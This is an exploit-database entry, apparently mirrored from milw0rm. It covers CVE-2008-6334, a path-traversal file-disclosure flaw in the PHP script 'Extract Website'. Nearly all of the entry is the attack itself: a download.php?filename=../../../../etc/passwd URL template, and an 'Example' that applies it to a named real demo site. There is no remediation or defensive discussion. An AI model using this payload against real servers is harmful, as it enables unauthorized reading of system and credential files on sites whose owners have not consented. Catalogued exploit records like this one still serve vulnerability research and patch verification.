[] NeoSense
E X P L O I T S
title author type platform port cve id

Extract Website - 'Filename' File Disclosure

Author: Cold Zero
type: webapps
platform: php
port: 
date_added: 2008-12-18 
date_updated: 2017-01-05 
verified: 1 
codes: OSVDB-50915;CVE-2008-6334 
tags: 
aliases:  
screenshot_url:  
application_url: 
Extract Website (download.php filename) Local File Include

# author : Cold z3ro, http://www.hackteach.org/
# script : http://secure.emetrix.com/order/product.asp?PID=74332316
# demo   : http://www.rightscripts.com/extractwebsite/
# about  : This tool help you extract web data include URL links,
       domain names, contact emails, keywords, meta tags, page titles
       or text from other website.
       You can extract these data from a list of website links or from simple text.


# Exploit

[~] http://www.site.com/[path]/download.php?filename=../../../../../../../../etc/passwd



# Example

[~] http://www.rightscripts.com/extractwebsite/download.php?filename=../../../../../../../../etc/passwd


==================================
Greetz : www.hackteach.org members , AnGeL25dZ

# milw0rm.com [2008-12-19]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.